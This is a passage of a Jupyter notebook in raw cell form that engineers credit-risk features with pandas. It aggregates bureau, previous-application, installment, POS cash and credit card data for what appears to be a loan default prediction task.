in range(1,6):\n bureau['STATUS_12345'] += bureau['STATUS_{}'.format(i)]", "_____no_output_____" ], [ "features = ['AMT_CREDIT_MAX_OVERDUE', 'AMT_CREDIT_SUM_OVERDUE', 'AMT_CREDIT_SUM',\n 'AMT_CREDIT_SUM_DEBT', 'DEBT_PERCENTAGE', 'DEBT_CREDIT_DIFF', 'STATUS_0', 'STATUS_12345']\nagg_length = bureau.groupby('MONTHS_BALANCE_SIZE')[features].mean().reset_index()\nagg_length.rename({feat: 'LL_' + feat for feat in features}, axis=1, inplace=True)\nbureau = bureau.merge(agg_length, how='left', on='MONTHS_BALANCE_SIZE')\ndel agg_length; gc.collect()", "_____no_output_____" ], [ "BUREAU_AGG = {\n 'SK_ID_BUREAU': ['nunique'],\n 'DAYS_CREDIT': ['min', 'max', 'mean'],\n 'DAYS_CREDIT_ENDDATE': ['min', 'max'],\n 'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],\n 'AMT_CREDIT_SUM': ['max', 'mean', 'sum'],\n 'AMT_CREDIT_SUM_DEBT': ['max', 'mean', 'sum'],\n 'AMT_CREDIT_SUM_OVERDUE': ['max', 'mean', 'sum'],\n 'AMT_ANNUITY': ['mean'],\n 'DEBT_CREDIT_DIFF': ['mean', 'sum'],\n 
'MONTHS_BALANCE_MEAN': ['mean', 'var'],\n 'MONTHS_BALANCE_SIZE': ['mean', 'sum'],\n 'STATUS_0': ['mean'],\n 'STATUS_1': ['mean'],\n 'STATUS_12345': ['mean'],\n 'STATUS_C': ['mean'],\n 'STATUS_X': ['mean'],\n 'CREDIT_ACTIVE_Active': ['mean'],\n 'CREDIT_ACTIVE_Closed': ['mean'],\n 'CREDIT_ACTIVE_Sold': ['mean'],\n 'CREDIT_TYPE_Consumer credit': ['mean'],\n 'CREDIT_TYPE_Credit card': ['mean'],\n 'CREDIT_TYPE_Car loan': ['mean'],\n 'CREDIT_TYPE_Mortgage': ['mean'],\n 'CREDIT_TYPE_Microloan': ['mean'],\n 'LL_AMT_CREDIT_SUM_OVERDUE': ['mean'],\n 'LL_DEBT_CREDIT_DIFF': ['mean'],\n 'LL_STATUS_12345': ['mean'],\n}\n\nBUREAU_ACTIVE_AGG = {\n 'DAYS_CREDIT': ['max', 'mean'],\n 'DAYS_CREDIT_ENDDATE': ['min', 'max'],\n 'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],\n 'AMT_CREDIT_SUM': ['max', 'sum'],\n 'AMT_CREDIT_SUM_DEBT': ['mean', 'sum'],\n 'AMT_CREDIT_SUM_OVERDUE': ['max', 'mean'],\n 'DAYS_CREDIT_UPDATE': ['min', 'mean'],\n 'DEBT_PERCENTAGE': ['mean'],\n 'DEBT_CREDIT_DIFF': ['mean'],\n 'CREDIT_TO_ANNUITY_RATIO': ['mean'],\n 'MONTHS_BALANCE_MEAN': ['mean', 'var'],\n 'MONTHS_BALANCE_SIZE': ['mean', 'sum'],\n}\n\nBUREAU_CLOSED_AGG = {\n 'DAYS_CREDIT': ['max', 'var'],\n 'DAYS_CREDIT_ENDDATE': ['max'],\n 'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],\n 'AMT_CREDIT_SUM_OVERDUE': ['mean'],\n 'AMT_CREDIT_SUM': ['max', 'mean', 'sum'],\n 'AMT_CREDIT_SUM_DEBT': ['max', 'sum'],\n 'DAYS_CREDIT_UPDATE': ['max'],\n 'ENDDATE_DIF': ['mean'],\n 'STATUS_12345': ['mean'],\n}\n\nBUREAU_LOAN_TYPE_AGG = {\n 'DAYS_CREDIT': ['mean', 'max'],\n 'AMT_CREDIT_MAX_OVERDUE': ['mean', 'max'],\n 'AMT_CREDIT_SUM': ['mean', 'max'],\n 'AMT_CREDIT_SUM_DEBT': ['mean', 'max'],\n 'DEBT_PERCENTAGE': ['mean'],\n 'DEBT_CREDIT_DIFF': ['mean'],\n 'DAYS_CREDIT_ENDDATE': ['max'],\n}\n\nBUREAU_TIME_AGG = {\n 'AMT_CREDIT_MAX_OVERDUE': ['max', 'mean'],\n 'AMT_CREDIT_SUM_OVERDUE': ['mean'],\n 'AMT_CREDIT_SUM': ['max', 'sum'],\n 'AMT_CREDIT_SUM_DEBT': ['mean', 'sum'],\n 'DEBT_PERCENTAGE': ['mean'],\n 'DEBT_CREDIT_DIFF': ['mean'],\n 'STATUS_0': ['mean'],\n 'STATUS_12345': ['mean'],\n}", "_____no_output_____" ], [ "agg_bureau = group(bureau, 'BUREAU_', BUREAU_AGG)\nactive = bureau[bureau['CREDIT_ACTIVE_Active'] == 1]\nagg_bureau = group_and_merge(active,agg_bureau,'BUREAU_ACTIVE_',BUREAU_ACTIVE_AGG)\nclosed = bureau[bureau['CREDIT_ACTIVE_Closed'] == 1]\nagg_bureau = group_and_merge(closed,agg_bureau,'BUREAU_CLOSED_',BUREAU_CLOSED_AGG)\ndel active, closed; gc.collect()\nfor credit_type in ['Consumer credit', 'Credit card', 'Mortgage', 'Car loan', 'Microloan']:\n type_df = bureau[bureau['CREDIT_TYPE_' + credit_type] == 1]\n prefix = 'BUREAU_' + credit_type.split(' ')[0].upper() + '_'\n agg_bureau = group_and_merge(type_df, agg_bureau, prefix, BUREAU_LOAN_TYPE_AGG)\n del type_df; gc.collect()\nfor time_frame in [6, 12]:\n prefix = \"BUREAU_LAST{}M_\".format(time_frame)\n time_frame_df = bureau[bureau['DAYS_CREDIT'] >= -30*time_frame]\n agg_bureau = group_and_merge(time_frame_df, agg_bureau, prefix, BUREAU_TIME_AGG)\n del time_frame_df; gc.collect()", "_____no_output_____" ], [ "sort_bureau = bureau.sort_values(by=['DAYS_CREDIT'])\ngr = sort_bureau.groupby('SK_ID_CURR')['AMT_CREDIT_MAX_OVERDUE'].last().reset_index()\ngr.rename({'AMT_CREDIT_MAX_OVERDUE': 'BUREAU_LAST_LOAN_MAX_OVERDUE'}, inplace=True)\nagg_bureau = agg_bureau.merge(gr, on='SK_ID_CURR', how='left')\nagg_bureau['BUREAU_DEBT_OVER_CREDIT'] = \\\n agg_bureau['BUREAU_AMT_CREDIT_SUM_DEBT_SUM']/agg_bureau['BUREAU_AMT_CREDIT_SUM_SUM']\nagg_bureau['BUREAU_ACTIVE_DEBT_OVER_CREDIT'] = \\\n 
agg_bureau['BUREAU_ACTIVE_AMT_CREDIT_SUM_DEBT_SUM']/agg_bureau['BUREAU_ACTIVE_AMT_CREDIT_SUM_SUM']", "_____no_output_____" ], [ "df = pd.merge(df, agg_bureau, on='SK_ID_CURR', how='left')\ndel agg_bureau, bureau\ngc.collect()", "_____no_output_____" ], [ "prev = pd.read_csv(os.path.join(DATA_DIRECTORY, 'previous_application.csv'))\npay = pd.read_csv(os.path.join(DATA_DIRECTORY, 'installments_payments.csv'))", "_____no_output_____" ], [ "PREVIOUS_AGG = {\n 'SK_ID_PREV': ['nunique'],\n 'AMT_ANNUITY': ['min', 'max', 'mean'],\n 'AMT_DOWN_PAYMENT': ['max', 'mean'],\n 'HOUR_APPR_PROCESS_START': ['min', 'max', 'mean'],\n 'RATE_DOWN_PAYMENT': ['max', 'mean'],\n 'DAYS_DECISION': ['min', 'max', 'mean'],\n 'CNT_PAYMENT': ['max', 'mean'],\n 'DAYS_TERMINATION': ['max'],\n # Engineered features\n 'CREDIT_TO_ANNUITY_RATIO': ['mean', 'max'],\n 'APPLICATION_CREDIT_DIFF': ['min', 'max', 'mean'],\n 'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean', 'var'],\n 'DOWN_PAYMENT_TO_CREDIT': ['mean'],\n}\n\nPREVIOUS_ACTIVE_AGG = {\n 'SK_ID_PREV': ['nunique'],\n 'SIMPLE_INTERESTS': ['mean'],\n 'AMT_ANNUITY': ['max', 'sum'],\n 'AMT_APPLICATION': ['max', 'mean'],\n 'AMT_CREDIT': ['sum'],\n 'AMT_DOWN_PAYMENT': ['max', 'mean'],\n 'DAYS_DECISION': ['min', 'mean'],\n 'CNT_PAYMENT': ['mean', 'sum'],\n 'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],\n # Engineered features\n 'AMT_PAYMENT': ['sum'],\n 'INSTALMENT_PAYMENT_DIFF': ['mean', 'max'],\n 'REMAINING_DEBT': ['max', 'mean', 'sum'],\n 'REPAYMENT_RATIO': ['mean'],\n}\nPREVIOUS_LATE_PAYMENTS_AGG = {\n 'DAYS_DECISION': ['min', 'max', 'mean'],\n 'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],\n # Engineered features\n 'APPLICATION_CREDIT_DIFF': ['min'],\n 'NAME_CONTRACT_TYPE_Consumer loans': ['mean'],\n 'NAME_CONTRACT_TYPE_Cash loans': ['mean'],\n 'NAME_CONTRACT_TYPE_Revolving loans': ['mean'],\n}\n\nPREVIOUS_LOAN_TYPE_AGG = {\n 'AMT_CREDIT': ['sum'],\n 'AMT_ANNUITY': ['mean', 'max'],\n 'SIMPLE_INTERESTS': ['min', 'mean', 'max', 'var'],\n 'APPLICATION_CREDIT_DIFF': ['min', 'var'],\n 'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean'],\n 'DAYS_DECISION': ['max'],\n 'DAYS_LAST_DUE_1ST_VERSION': ['max', 'mean'],\n 'CNT_PAYMENT': ['mean'],\n}\n\nPREVIOUS_TIME_AGG = {\n 'AMT_CREDIT': ['sum'],\n 'AMT_ANNUITY': ['mean', 'max'],\n 'SIMPLE_INTERESTS': ['mean', 'max'],\n 'DAYS_DECISION': ['min', 'mean'],\n 'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],\n # Engineered features\n 'APPLICATION_CREDIT_DIFF': ['min'],\n 'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean'],\n 'NAME_CONTRACT_TYPE_Consumer loans': ['mean'],\n 'NAME_CONTRACT_TYPE_Cash loans': ['mean'],\n 'NAME_CONTRACT_TYPE_Revolving loans': ['mean'],\n}\n\nPREVIOUS_APPROVED_AGG = {\n 'SK_ID_PREV': ['nunique'],\n 'AMT_ANNUITY': ['min', 'max', 'mean'],\n 'AMT_CREDIT': ['min', 'max', 'mean'],\n 'AMT_DOWN_PAYMENT': ['max'],\n 'AMT_GOODS_PRICE': ['max'],\n 'HOUR_APPR_PROCESS_START': ['min', 'max'],\n 'DAYS_DECISION': ['min', 'mean'],\n 'CNT_PAYMENT': ['max', 'mean'],\n 'DAYS_TERMINATION': ['mean'],\n # Engineered features\n 'CREDIT_TO_ANNUITY_RATIO': ['mean', 'max'],\n 'APPLICATION_CREDIT_DIFF': ['max'],\n 'APPLICATION_CREDIT_RATIO': ['min', 'max', 'mean'],\n # The following features are only for approved applications\n 'DAYS_FIRST_DRAWING': ['max', 'mean'],\n 'DAYS_FIRST_DUE': ['min', 'mean'],\n 'DAYS_LAST_DUE_1ST_VERSION': ['min', 'max', 'mean'],\n 'DAYS_LAST_DUE': ['max', 'mean'],\n 'DAYS_LAST_DUE_DIFF': ['min', 'max', 'mean'],\n 'SIMPLE_INTERESTS': ['min', 'max', 'mean'],\n}\n\nPREVIOUS_REFUSED_AGG = {\n 
'AMT_APPLICATION': ['max', 'mean'],\n 'AMT_CREDIT': ['min', 'max'],\n 'DAYS_DECISION': ['min', 'max', 'mean'],\n 'CNT_PAYMENT': ['max', 'mean'],\n # Engineered features\n 'APPLICATION_CREDIT_DIFF': ['min', 'max', 'mean', 'var'],\n 'APPLICATION_CREDIT_RATIO': ['min', 'mean'],\n 'NAME_CONTRACT_TYPE_Consumer loans': ['mean'],\n 'NAME_CONTRACT_TYPE_Cash loans': ['mean'],\n 'NAME_CONTRACT_TYPE_Revolving loans': ['mean'],\n}\n", "_____no_output_____" ], [ "ohe_columns = [\n 'NAME_CONTRACT_STATUS', 'NAME_CONTRACT_TYPE', 'CHANNEL_TYPE',\n 'NAME_TYPE_SUITE', 'NAME_YIELD_GROUP', 'PRODUCT_COMBINATION',\n 'NAME_PRODUCT_TYPE', 'NAME_CLIENT_TYPE']\nprev, categorical_cols = one_hot_encoder(prev, ohe_columns, nan_as_category= False)", "_____no_output_____" ], [ "prev['APPLICATION_CREDIT_DIFF'] = prev['AMT_APPLICATION'] - prev['AMT_CREDIT']\nprev['APPLICATION_CREDIT_RATIO'] = prev['AMT_APPLICATION'] / prev['AMT_CREDIT']\nprev['CREDIT_TO_ANNUITY_RATIO'] = prev['AMT_CREDIT']/prev['AMT_ANNUITY']\nprev['DOWN_PAYMENT_TO_CREDIT'] = prev['AMT_DOWN_PAYMENT'] / prev['AMT_CREDIT']\ntotal_payment = prev['AMT_ANNUITY'] * prev['CNT_PAYMENT']\nprev['SIMPLE_INTERESTS'] = (total_payment/prev['AMT_CREDIT'] - 1)/prev['CNT_PAYMENT']", "_____no_output_____" ], [ "approved = prev[prev['NAME_CONTRACT_STATUS_Approved'] == 1]\nactive_df = approved[approved['DAYS_LAST_DUE'] == 365243]\nactive_pay = pay[pay['SK_ID_PREV'].isin(active_df['SK_ID_PREV'])]\nactive_pay_agg = active_pay.groupby('SK_ID_PREV')[['AMT_INSTALMENT', 'AMT_PAYMENT']].sum()\nactive_pay_agg.reset_index(inplace= True)\nactive_pay_agg['INSTALMENT_PAYMENT_DIFF'] = active_pay_agg['AMT_INSTALMENT'] - active_pay_agg['AMT_PAYMENT']\nactive_df = active_df.merge(active_pay_agg, on= 'SK_ID_PREV', how= 'left')\nactive_df['REMAINING_DEBT'] = active_df['AMT_CREDIT'] - active_df['AMT_PAYMENT']\nactive_df['REPAYMENT_RATIO'] = active_df['AMT_PAYMENT'] / active_df['AMT_CREDIT']\nactive_agg_df = group(active_df, 'PREV_ACTIVE_', PREVIOUS_ACTIVE_AGG)\nactive_agg_df['TOTAL_REPAYMENT_RATIO'] = active_agg_df['PREV_ACTIVE_AMT_PAYMENT_SUM']/\\\n active_agg_df['PREV_ACTIVE_AMT_CREDIT_SUM']\ndel active_pay, active_pay_agg, active_df; gc.collect()", "_____no_output_____" ], [ "prev['DAYS_FIRST_DRAWING'].replace(365243, np.nan, inplace= True)\nprev['DAYS_FIRST_DUE'].replace(365243, np.nan, inplace= True)\nprev['DAYS_LAST_DUE_1ST_VERSION'].replace(365243, np.nan, inplace= True)\nprev['DAYS_LAST_DUE'].replace(365243, np.nan, inplace= True)\nprev['DAYS_TERMINATION'].replace(365243, np.nan, inplace= True)", "_____no_output_____" ], [ "prev['DAYS_LAST_DUE_DIFF'] = prev['DAYS_LAST_DUE_1ST_VERSION'] - prev['DAYS_LAST_DUE']\napproved['DAYS_LAST_DUE_DIFF'] = approved['DAYS_LAST_DUE_1ST_VERSION'] - approved['DAYS_LAST_DUE']", "_____no_output_____" ], [ "categorical_agg = {key: ['mean'] for key in categorical_cols}", "_____no_output_____" ], [ "agg_prev = group(prev, 'PREV_', {**PREVIOUS_AGG, **categorical_agg})\nagg_prev = agg_prev.merge(active_agg_df, how='left', on='SK_ID_CURR')\ndel active_agg_df; gc.collect()", "_____no_output_____" ], [ "agg_prev = group_and_merge(approved, agg_prev, 'APPROVED_', PREVIOUS_APPROVED_AGG)\nrefused = prev[prev['NAME_CONTRACT_STATUS_Refused'] == 1]\nagg_prev = group_and_merge(refused, agg_prev, 'REFUSED_', PREVIOUS_REFUSED_AGG)\ndel approved, refused; gc.collect()", "_____no_output_____" ], [ "for loan_type in ['Consumer loans', 'Cash loans']:\n type_df = prev[prev['NAME_CONTRACT_TYPE_{}'.format(loan_type)] == 1]\n prefix = 'PREV_' + loan_type.split(\" \")[0] + '_'\n 
agg_prev = group_and_merge(type_df, agg_prev, prefix, PREVIOUS_LOAN_TYPE_AGG)\n del type_df; gc.collect()", "_____no_output_____" ], [ "pay['LATE_PAYMENT'] = pay['DAYS_ENTRY_PAYMENT'] - pay['DAYS_INSTALMENT']\npay['LATE_PAYMENT'] = pay['LATE_PAYMENT'].apply(lambda x: 1 if x > 0 else 0)\ndpd_id = pay[pay['LATE_PAYMENT'] > 0]['SK_ID_PREV'].unique()", "_____no_output_____" ], [ "agg_dpd = group_and_merge(prev[prev['SK_ID_PREV'].isin(dpd_id)], agg_prev,\n 'PREV_LATE_', PREVIOUS_LATE_PAYMENTS_AGG)\ndel agg_dpd, dpd_id; gc.collect()", "_____no_output_____" ], [ "for time_frame in [12, 24]:\n time_frame_df = prev[prev['DAYS_DECISION'] >= -30*time_frame]\n prefix = 'PREV_LAST{}M_'.format(time_frame)\n agg_prev = group_and_merge(time_frame_df, agg_prev, prefix, PREVIOUS_TIME_AGG)\n del time_frame_df; gc.collect()\ndel prev; gc.collect()", "_____no_output_____" ], [ "df = pd.merge(df, agg_prev, on='SK_ID_CURR', how='left')\ndel agg_prev; gc.collect()", "_____no_output_____" ], [ "pos = pd.read_csv(os.path.join(DATA_DIRECTORY, 'POS_CASH_balance.csv'))\npos, categorical_cols = one_hot_encoder(pos, nan_as_category= False)", "_____no_output_____" ], [ "pos['LATE_PAYMENT'] = pos['SK_DPD'].apply(lambda x: 1 if x > 0 else 0)", "_____no_output_____" ], [ "POS_CASH_AGG = {\n 'SK_ID_PREV': ['nunique'],\n 'MONTHS_BALANCE': ['min', 'max', 'size'],\n 'SK_DPD': ['max', 'mean', 'sum', 'var'],\n 'SK_DPD_DEF': ['max', 'mean', 'sum'],\n 'LATE_PAYMENT': ['mean']\n}\n\ncategorical_agg = {key: ['mean'] for key in categorical_cols}\npos_agg = group(pos, 'POS_', {**POS_CASH_AGG, **categorical_agg})", "_____no_output_____" ], [ "sort_pos = pos.sort_values(by=['SK_ID_PREV', 'MONTHS_BALANCE'])\ngp = sort_pos.groupby('SK_ID_PREV')\ntemp = pd.DataFrame()\ntemp['SK_ID_CURR'] = gp['SK_ID_CURR'].first()\ntemp['MONTHS_BALANCE_MAX'] = gp['MONTHS_BALANCE'].max()", "_____no_output_____" ], [ "temp['POS_LOAN_COMPLETED_MEAN'] = gp['NAME_CONTRACT_STATUS_Completed'].mean()\ntemp['POS_COMPLETED_BEFORE_MEAN'] = gp['CNT_INSTALMENT'].first() - gp['CNT_INSTALMENT'].last()\ntemp['POS_COMPLETED_BEFORE_MEAN'] = temp.apply(lambda x: 1 if x['POS_COMPLETED_BEFORE_MEAN'] > 0\n and x['POS_LOAN_COMPLETED_MEAN'] > 0 else 0, axis=1)", "_____no_output_____" ], [ "temp['POS_REMAINING_INSTALMENTS'] = gp['CNT_INSTALMENT_FUTURE'].last()\ntemp['POS_REMAINING_INSTALMENTS_RATIO'] = gp['CNT_INSTALMENT_FUTURE'].last()/gp['CNT_INSTALMENT'].last()", "_____no_output_____" ], [ "temp_gp = temp.groupby('SK_ID_CURR').sum().reset_index()\ntemp_gp.drop(['MONTHS_BALANCE_MAX'], axis=1, inplace= True)\npos_agg = pd.merge(pos_agg, temp_gp, on= 'SK_ID_CURR', how= 'left')\ndel temp, gp, temp_gp, sort_pos; gc.collect()", "_____no_output_____" ], [ "pos = do_sum(pos, ['SK_ID_PREV'], 'LATE_PAYMENT', 'LATE_PAYMENT_SUM')", "_____no_output_____" ], [ "last_month_df = pos.groupby('SK_ID_PREV')['MONTHS_BALANCE'].idxmax()", "_____no_output_____" ], [ "sort_pos = pos.sort_values(by=['SK_ID_PREV', 'MONTHS_BALANCE'])\ngp = sort_pos.iloc[last_month_df].groupby('SK_ID_CURR').tail(3)\ngp_mean = gp.groupby('SK_ID_CURR').mean().reset_index()\npos_agg = pd.merge(pos_agg, gp_mean[['SK_ID_CURR','LATE_PAYMENT_SUM']], on='SK_ID_CURR', how='left')", "_____no_output_____" ], [ "drop_features = [\n 'POS_NAME_CONTRACT_STATUS_Canceled_MEAN', 'POS_NAME_CONTRACT_STATUS_Amortized debt_MEAN',\n 'POS_NAME_CONTRACT_STATUS_XNA_MEAN']\npos_agg.drop(drop_features, axis=1, inplace=True)", "_____no_output_____" ], [ "df = pd.merge(df, pos_agg, on='SK_ID_CURR', how='left')", "_____no_output_____" ], [ "pay = 
do_sum(pay, ['SK_ID_PREV', 'NUM_INSTALMENT_NUMBER'], 'AMT_PAYMENT', 'AMT_PAYMENT_GROUPED')\npay['PAYMENT_DIFFERENCE'] = pay['AMT_INSTALMENT'] - pay['AMT_PAYMENT_GROUPED']\npay['PAYMENT_RATIO'] = pay['AMT_INSTALMENT'] / pay['AMT_PAYMENT_GROUPED']\npay['PAID_OVER_AMOUNT'] = pay['AMT_PAYMENT'] - pay['AMT_INSTALMENT']\npay['PAID_OVER'] = (pay['PAID_OVER_AMOUNT'] > 0).astype(int)", "_____no_output_____" ], [ "pay['DPD'] = pay['DAYS_ENTRY_PAYMENT'] - pay['DAYS_INSTALMENT']\npay['DPD'] = pay['DPD'].apply(lambda x: 0 if x <= 0 else x)\npay['DBD'] = pay['DAYS_INSTALMENT'] - pay['DAYS_ENTRY_PAYMENT']\npay['DBD'] = pay['DBD'].apply(lambda x: 0 if x <= 0 else x)", "_____no_output_____" ], [ "pay['LATE_PAYMENT'] = pay['DBD'].apply(lambda x: 1 if x > 0 else 0)", "_____no_output_____" ], [ "pay['INSTALMENT_PAYMENT_RATIO'] = pay['AMT_PAYMENT'] / pay['AMT_INSTALMENT']\npay['LATE_PAYMENT_RATIO'] = pay.apply(lambda x: x['INSTALMENT_PAYMENT_RATIO'] if x['LATE_PAYMENT'] == 1 else 0, axis=1)", "_____no_output_____" ], [ "pay['SIGNIFICANT_LATE_PAYMENT'] = pay['LATE_PAYMENT_RATIO'].apply(lambda x: 1 if x > 0.05 else 0)", "_____no_output_____" ], [ "pay['DPD_7'] = pay['DPD'].apply(lambda x: 1 if x >= 7 else 0)\npay['DPD_15'] = pay['DPD'].apply(lambda x: 1 if x >= 15 else 0)", "_____no_output_____" ], [ "INSTALLMENTS_AGG = {\n 'SK_ID_PREV': ['size', 'nunique'],\n 'DAYS_ENTRY_PAYMENT': ['min', 'max', 'mean'],\n 'AMT_INSTALMENT': ['min', 'max', 'mean', 'sum'],\n 'AMT_PAYMENT': ['min', 'max', 'mean', 'sum'],\n 'DPD': ['max', 'mean', 'var'],\n 'DBD': ['max', 'mean', 'var'],\n 'PAYMENT_DIFFERENCE': ['mean'],\n 'PAYMENT_RATIO': ['mean'],\n 'LATE_PAYMENT': ['mean', 'sum'],\n 'SIGNIFICANT_LATE_PAYMENT': ['mean', 'sum'],\n 'LATE_PAYMENT_RATIO': ['mean'],\n 'DPD_7': ['mean'],\n 'DPD_15': ['mean'],\n 'PAID_OVER': ['mean']\n}\n\npay_agg = group(pay, 'INS_', INSTALLMENTS_AGG)", "_____no_output_____" ], [ "INSTALLMENTS_TIME_AGG = {\n 'SK_ID_PREV': ['size'],\n 'DAYS_ENTRY_PAYMENT': ['min', 'max', 'mean'],\n 'AMT_INSTALMENT': ['min', 'max', 'mean', 'sum'],\n 'AMT_PAYMENT': ['min', 'max', 'mean', 'sum'],\n 'DPD': ['max', 'mean', 'var'],\n 'DBD': ['max', 'mean', 'var'],\n 'PAYMENT_DIFFERENCE': ['mean'],\n 'PAYMENT_RATIO': ['mean'],\n 'LATE_PAYMENT': ['mean'],\n 'SIGNIFICANT_LATE_PAYMENT': ['mean'],\n 'LATE_PAYMENT_RATIO': ['mean'],\n 'DPD_7': ['mean'],\n 'DPD_15': ['mean'],\n}\n\nfor months in [36, 60]:\n recent_prev_id = pay[pay['DAYS_INSTALMENT'] >= -30*months]['SK_ID_PREV'].unique()\n pay_recent = pay[pay['SK_ID_PREV'].isin(recent_prev_id)]\n prefix = 'INS_{}M_'.format(months)\n pay_agg = group_and_merge(pay_recent, pay_agg, prefix, INSTALLMENTS_TIME_AGG)", "_____no_output_____" ], [ "def add_features_in_group(features, gr_, feature_name, aggs, prefix):\n for agg in aggs:\n if agg == 'sum':\n features['{}{}_sum'.format(prefix, feature_name)] = gr_[feature_name].sum()\n elif agg == 'mean':\n features['{}{}_mean'.format(prefix, feature_name)] = gr_[feature_name].mean()\n elif agg == 'max':\n features['{}{}_max'.format(prefix, feature_name)] = gr_[feature_name].max()\n elif agg == 'min':\n features['{}{}_min'.format(prefix, feature_name)] = gr_[feature_name].min()\n elif agg == 'std':\n features['{}{}_std'.format(prefix, feature_name)] = gr_[feature_name].std()\n elif agg == 'count':\n features['{}{}_count'.format(prefix, feature_name)] = gr_[feature_name].count()\n elif agg == 'skew':\n features['{}{}_skew'.format(prefix, feature_name)] = skew(gr_[feature_name])\n elif agg == 'kurt':\n features['{}{}_kurt'.format(prefix, 
feature_name)] = kurtosis(gr_[feature_name])\n elif agg == 'iqr':\n features['{}{}_iqr'.format(prefix, feature_name)] = iqr(gr_[feature_name])\n elif agg == 'median':\n features['{}{}_median'.format(prefix, feature_name)] = gr_[feature_name].median()\n return features", "_____no_output_____" ], [ "def chunk_groups(groupby_object, chunk_size):\n n_groups = groupby_object.ngroups\n group_chunk, index_chunk = [], []\n for i, (index, df) in enumerate(groupby_object):\n group_chunk.append(df)\n index_chunk.append(index)\n if (i + 1) % chunk_size == 0 or i + 1 == n_groups:\n group_chunk_, index_chunk_ = group_chunk.copy(), index_chunk.copy()\n group_chunk, index_chunk = [], []\n yield index_chunk_, group_chunk_", "_____no_output_____" ], [ "def add_trend_feature(features, gr, feature_name, prefix):\n y = gr[feature_name].values\n try:\n x = np.arange(0, len(y)).reshape(-1, 1)\n lr = LinearRegression()\n lr.fit(x, y)\n trend = lr.coef_[0]\n except:\n trend = np.nan\n features['{}{}'.format(prefix, feature_name)] = trend\n return features", "_____no_output_____" ], [ "def parallel_apply(groups, func, index_name='Index', num_workers=0, chunk_size=100000):\n if num_workers <= 0: num_workers = 8\n #n_chunks = np.ceil(1.0 * groups.ngroups / chunk_size)\n indeces, features = [], []\n for index_chunk, groups_chunk in chunk_groups(groups, chunk_size):\n with mp.pool.Pool(num_workers) as executor:\n features_chunk = executor.map(func, groups_chunk)\n features.extend(features_chunk)\n indeces.extend(index_chunk)\n\n features = pd.DataFrame(features)\n features.index = indeces\n features.index.name = index_name\n return features", "_____no_output_____" ], [ "def trend_in_last_k_instalment_features(gr, periods):\n gr_ = gr.copy()\n gr_.sort_values(['DAYS_INSTALMENT'], ascending=False, inplace=True)\n features = {}\n\n for period in periods:\n gr_period = gr_.iloc[:period]\n features = add_trend_feature(features, gr_period, 'DPD',\n '{}_TREND_'.format(period))\n features = add_trend_feature(features, gr_period, 'PAID_OVER_AMOUNT',\n '{}_TREND_'.format(period))\n return features\n\ngroup_features = ['SK_ID_CURR', 'SK_ID_PREV', 'DPD', 'LATE_PAYMENT',\n 'PAID_OVER_AMOUNT', 'PAID_OVER', 'DAYS_INSTALMENT']\ngp = pay[group_features].groupby('SK_ID_CURR')\nfunc = partial(trend_in_last_k_instalment_features, periods=[12, 24, 60, 120])\ng = parallel_apply(gp, func, index_name='SK_ID_CURR', chunk_size=10000).reset_index()\npay_agg = pay_agg.merge(g, on='SK_ID_CURR', how='left')", "_____no_output_____" ], [ "def installments_last_loan_features(gr):\n gr_ = gr.copy()\n gr_.sort_values(['DAYS_INSTALMENT'], ascending=False, inplace=True)\n last_installment_id = gr_['SK_ID_PREV'].iloc[0]\n gr_ = gr_[gr_['SK_ID_PREV'] == last_installment_id]\n\n features = {}\n features = add_features_in_group(features, gr_, 'DPD',\n ['sum', 'mean', 'max', 'std'],\n 'LAST_LOAN_')\n features = add_features_in_group(features, gr_, 'LATE_PAYMENT',\n ['count', 'mean'],\n 'LAST_LOAN_')\n features = add_features_in_group(features, gr_, 'PAID_OVER_AMOUNT',\n ['sum', 'mean', 'max', 'min', 'std'],\n 'LAST_LOAN_')\n features = add_features_in_group(features, gr_, 'PAID_OVER',\n ['count', 'mean'],\n 'LAST_LOAN_')\n return features\n\ng = parallel_apply(gp, installments_last_loan_features, index_name='SK_ID_CURR', chunk_size=10000).reset_index()\npay_agg = pay_agg.merge(g, on='SK_ID_CURR', how='left')", "_____no_output_____" ], [ "df = pd.merge(df, pay_agg, on='SK_ID_CURR', how='left')\ndel pay_agg, gp, pay; gc.collect()", "_____no_output_____" ], [ "cc 
= pd.read_csv(os.path.join(DATA_DIRECTORY, 'credit_card_balance.csv'))\ncc, cat_cols = one_hot_encoder(cc, nan_as_category=False)\ncc.rename(columns={'AMT_RECIVABLE': 'AMT_RECEIVABLE'}, inplace=True)", "_____no_output_____" ], [ "cc['LIMIT_USE'] = cc['AMT_BALANCE'] / cc['AMT_CREDIT_LIMIT_ACTUAL']", "_____no_output_____" ], [ "cc['PAYMENT_DIV_MIN'] = cc['AMT_PAYMENT_CURRENT'] / cc['AMT_INST_MIN_REGULARITY']", "_____no_output_____" ], [ "cc['LATE_PAYMENT'] = cc['SK_DPD'].apply(lambda x: 1 if x > 0 else 0)", "_____no_output_____" ], [ "cc['DRAWING_LIMIT_RATIO'] = cc['AMT_DRAWINGS_ATM_CURRENT'] / cc['AMT_CREDIT_LIMIT_ACTUAL']", "_____no_output_____" ], [ "CREDIT_CARD_AGG = {\n 'MONTHS_BALANCE': ['min'],\n 'AMT_BALANCE': ['max'],\n 'AMT_CREDIT_LIMIT_ACTUAL': ['max'],\n 'AMT_DRAWINGS_ATM_CURRENT': ['max', 'sum'],\n 'AMT_DRAWINGS_CURRENT': ['max', 'sum'],\n 'AMT_DRAWINGS_POS_CURRENT': ['max', 'sum'],\n 'AMT_INST_MIN_REGULARITY': ['max', 'mean'],\n 'AMT_PAYMENT_TOTAL_CURRENT': ['max', 'mean', 'sum', 'var'],\n 'AMT_TOTAL_RECEIVABLE': ['max', 'mean'],\n 'CNT_DRAWINGS_ATM_CURRENT': ['max', 'mean', 'sum'],\n 'CNT_DRAWINGS_CURRENT': ['max', 'mean', 'sum'],\n 'CNT_DRAWINGS_POS_CURRENT': ['mean'],\n 'SK_DPD': ['mean', 'max', 'sum'],\n 'SK_DPD_DEF': ['max', 'sum'],\n 'LIMIT_USE': ['max', 'mean'],\n 